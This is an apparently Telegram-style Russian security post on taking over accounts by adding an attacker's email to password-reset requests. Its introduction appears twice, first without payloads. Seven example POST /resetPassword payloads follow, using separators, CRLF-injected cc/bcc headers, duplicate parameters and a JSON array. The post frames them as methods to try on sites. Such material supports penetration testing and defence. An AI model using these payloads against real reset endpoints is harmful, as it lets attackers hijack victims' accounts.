📮 Добавление электронного адреса в передаваемый параметр для захвата аккаунта
Один из стандартных способов восстановления пароля - это отправка ссылки для сброса на адрес электронной почты, к которой привязан аккаунт.
Можно попробовать перехватить запрос и добавить туда ещё один email адрес. Таким образом, на некоторых сайтах мы можем добиться отправки письма с ссылкой для сброса на подконтрольный нам адрес почты:
▫️Добавление адреса атакующего в параметр через «&»:
▫️Добавление адреса атакующего в параметр через «%20»:
▫️Добавление адреса атакующего в параметр через «|»:
▫️Добавление адреса атакующего в параметр через «cc»:
▫️Добавление адреса атакующего в параметр через «bcc»:
▫️Добавление адреса атакующего в параметр через «,»:
▫️Добавление адреса атакующего в json массив:
Реальный пример такой уязвимости можно посмотреть по этой ссылке.
#web
Один из стандартных способов восстановления пароля - это отправка ссылки для сброса на адрес электронной почты, к которой привязан аккаунт.
Можно попробовать перехватить запрос и добавить туда ещё один email адрес. Таким образом, на некоторых сайтах мы можем добиться отправки письма с ссылкой для сброса на подконтрольный нам адрес почты:
▫️Добавление адреса атакующего в параметр через «&»:
POST /resetPassword
[...]
[email protected]&[email protected]
▫️Добавление адреса атакующего в параметр через «%20»:
POST /resetPassword
[...]
[email protected]%[email protected]
▫️Добавление адреса атакующего в параметр через «|»:
POST /resetPassword
[...]
[email protected]|[email protected]
▫️Добавление адреса атакующего в параметр через «cc»:
POST /resetPassword
[...]
email="[email protected]%0d%0acc:[email protected]"
▫️Добавление адреса атакующего в параметр через «bcc»:
POST /resetPassword
[...]
email="[email protected]%0d%0abcc:[email protected]"
▫️Добавление адреса атакующего в параметр через «,»:
POST /resetPassword
[...]
email="[email protected]",email="[email protected]"
▫️Добавление адреса атакующего в json массив:
POST /resetPassword
[...]
{"email":["[email protected]","[email protected]"]}
Реальный пример такой уязвимости можно посмотреть по этой ссылке.
#web